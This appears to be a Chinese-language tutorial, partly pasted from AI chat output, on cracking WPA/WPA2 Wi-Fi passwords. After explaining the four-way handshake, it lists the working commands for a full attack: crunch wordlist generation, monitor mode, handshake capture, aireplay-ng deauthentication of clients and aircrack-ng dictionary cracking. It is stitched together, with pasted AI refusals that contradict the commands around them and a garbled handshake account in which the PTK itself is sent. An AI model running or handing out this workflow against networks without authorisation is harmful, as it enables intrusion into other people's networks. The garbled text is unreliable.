WPA概念介绍

WPA全名为Wi-Fi Protected Access，有WPA和WPA2两个标准，是一种保护无线网络的安全协议。WPA实现了.11i标准的大部分内容，是在802.11i完备之前替代WEP的过渡方案，后来被WPA2取代。由于WPA和WPA2都属于802.11i，因此在技术层面几乎是相同的。主要区别在于WPA2要求支持更安全的CCMP。

工作原理

WPA和WPA2使用802.11i中定义的四次握手来进行工作。客户端（STA）和接入点（AP）通过四次握手相互验证和协商名为成对临时密钥（Pairwise Transient Key，PTK）的会话密钥。PTK通过成对主密钥（Pairwise Master Key，PMK）、AP随机数、STA随机数和双方MAC地址等计算生成。其中，PMK由登录密码等双方均已知的信息计算生成。而后续正常数据加密所使用的临时密钥（Pairwise Key，TK）即派生自PTK。各密钥和参数的关系如下：

• PMK: Pairwise Master Key，成对主密钥
• PTK: Pairwise Transient Key，成对临时密钥
• TK: Pairwise Key，临时密钥

以上是关于WPA和WPA2的概念介绍和工作原理的简要说明。如有需要，可以进一步深入研究这些内容。

四次握手的过程可概括如下：

1）AP发送自己的随机数给STA。 2）STA生成随机数，计算出成对临时密钥（PTK），并将PTK和信息完整性校验码（MIC）发送给AP。 3）AP收到STA发送的PTK和MIC后，计算出相同的PTK（此时双方都有PTK），将组密钥（GTK）加密后连同MIC一起发送给STA。 4）STA收到GTK和MIC后，安装PTK和GTK，发送ACK确认给AP。AP收到确认后也安装PTK。

以上是四次握手的简要过程，通过这个过程，双方能够相互验证和协商会话密钥，确保无线网络的安全性。

http://192.168.1.1

crunch 8 8 -t %%%%%,,, > pwd.txt

参数说明：
8：最小长度
8：最大长度
-t：定义输出格式
，：代表大写字母
%：代表数字
^ :代表符号

tail pwd.txt

WiFi设置

1. 打开WiFi设置网站，通常可以在浏览器中输入路由器的IP地址来访问。用户名和密码通常可以在路由器的底部或背面找到。
2. 在WiFi设置网站中，找到无线配置选项。
3. 在无线配置中，选择适合你的需求的加密方式。常见的加密方式包括WPA2-PSK（推荐）和WPA-PSK。
4. 设置安全密钥，即WiFi密码。选择一个强密码，包含字母、数字和特殊字符，并确保密码长度足够长。

打造字典

1. 生成密码：可以使用密码生成器来生成强密码，确保密码的复杂性和安全性。
2. 查看字典：如果你需要使用一个密码字典来进行破解或测试，你可以寻找一个合适的字典文件。字典文件通常是一个包含大量密码的文本文件，可以使用工具或脚本来读取和处理。

请注意，使用密码字典进行破解或未经授权的测试是违法行为，应该遵守法律和道德规范。以上是关于WiFi设置和打造字典的简要说明，希望对你有所帮助。

vi pwd.txt
123455 
...
...

ip a

airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng wlan0mon -c 1 --bssid ?? -w wpa-1

参数说明
-c：指定信道
--bssid：AP的mac地址
-w：保存的抓包结果

aireplay-ng -0 5 -a ?? -c ?? wlan0mon

aircrack-ng -w /root/wifi/passwd.txt wpa-1-01.cap

手工打造

1. 查看网卡：确认你的网卡支持监听模式（monitor mode），可以使用命令行工具（如airmon-ng）或图形界面工具来查看网卡的支持情况。

2. 开启监听模式：使用命令行工具（如airmon-ng）将网卡切换到监听模式。这样可以使网卡能够捕获周围的WiFi信号。

3. 扫描WiFi：使用命令行工具（如airodump-ng）扫描周围的WiFi网络，获取目标网络的信息，包括BSSID（AP的MAC地址）和信道等。

4. 抓包保存：使用命令行工具（如airodump-ng）选择目标网络，开始抓包并将抓到的数据包保存到文件中，以便后续分析和破解。

5. 进行冲突模式攻击：使用命令行工具（如aireplay-ng）进行冲突模式攻击，将目标设备踢下线。当目标设备重新连接WiFi时，会生成握手包。

抓到握手包后，你可以停止攻击并进入下一步。

破解WiFi

1. 破解WiFi：使用命令行工具（如aircrack-ng）对抓到的握手包进行破解。破解过程中，工具会尝试使用密码字典或暴力破解等方式来破解WiFi密码。

请注意，进行WiFi渗透测试或破解是需要获得授权的，未经授权的测试是违法行为。此处提供的步骤仅供学习和了解用途，请遵守法律和道德规范。

aircrack-ng -w /root/wifi/pass.txt wpa-1-01.cap

crunch 8 8 -t %%%%%%,,,, | aircrack-ng wpa-1-01.cap -e wifi_name -w -

抱歉，但我无法提供关于破解WiFi密码的指导或示意图。破解WiFi密码是非法行为，违反了道德和法律规定。我鼓励您遵守法律和道德规范，以合法和合理的方式使用技术。如果您有任何其他关于网络安全或其他合法技术方面的问题，我将很愿意帮助您。

参数说明：
管道符将产生的密码传到-w后面的 -
-w指定密码字典变为指定动态生成的密码

airodump-ng wlan0mon -c 1 --bssid ?? -w wpa-1

aireplay-ng -0 5 -a ?? -c ?? wlan0mon

aircrack-ng -w /root/wifi/passwd.txt wpa-1-01.cap

抱歉，但我无法提供关于破解WiFi密码的指导或示意图。破解WiFi密码是非法行为，违反了道德和法律规定。我鼓励您遵守法律和道德规范，以合法和合理的方式使用技术。如果您有任何其他关于网络安全或其他合法技术方面的问题，我将很愿意帮助您。对于破解WiFi密码的相关信息，建议您参考合法的网络安全教程和资源。